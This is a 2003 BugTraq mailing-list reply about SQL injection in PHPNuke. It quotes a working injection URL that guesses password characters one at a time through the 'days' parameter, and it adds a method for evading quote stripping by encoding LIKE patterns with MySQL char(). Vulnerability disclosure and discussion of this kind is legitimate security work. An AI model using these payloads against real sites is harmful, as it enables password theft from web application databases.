|
|
BugTraq
PHPNuke SQL Injection Feb 20 2003 08:36PM Lucas Armstrong (lucas cgishield com) (2 replies) Re: PHPNuke SQL Injection / General SQL Injection Feb 21 2003 09:21PM David Walker (bugtraq grax com) (1 replies) |
|
Privacy Statement |
hola,
On 20 Feb 2003 20:36:11 -0000
Lucas Armstrong <lucas (at) cgishield (dot) com [email concealed]> wrote:
> To get around this problem, one could use the mysql char()
> function which will output any ascii value, without using quotes. So to
> guess the letter 'a' the hacker could use char(97). Here is an example url
> guessing the 3rd character in the pwd column as 'a':
> http://site/modules.php?
> name=search&query=&topic=&category=&author=&days=1+or+mid(a.pwd,3,1)=cha
r
> (97)&type=stories
JFYI:
this maybe off topic but it worth mentioning .. a couple of month ago we found out
that the mysql char() function can be used within the "like() - function" to place
quotes.
this may help somebody doing sql-injection in an "quote-stripped :-)" environment.
example query:
---*---
select id,Name,password from Users where id = 1 and (user() like "%root%");
---*---
and now "without" quotes:
---*---
select id,Name,password from Users where id = 1 and (user() like char(37,114,111,111,116,37));
---*---
...
nice day,
mEi
--
WebSec.org / Martin Eiszner
Gurkgasse 49/Top14
1140 Vienna
Austria / EUROPE
mei (at) websec (dot) org [email concealed]
http://www.websec.org
tel: 0043 699 121772 37
[ reply ]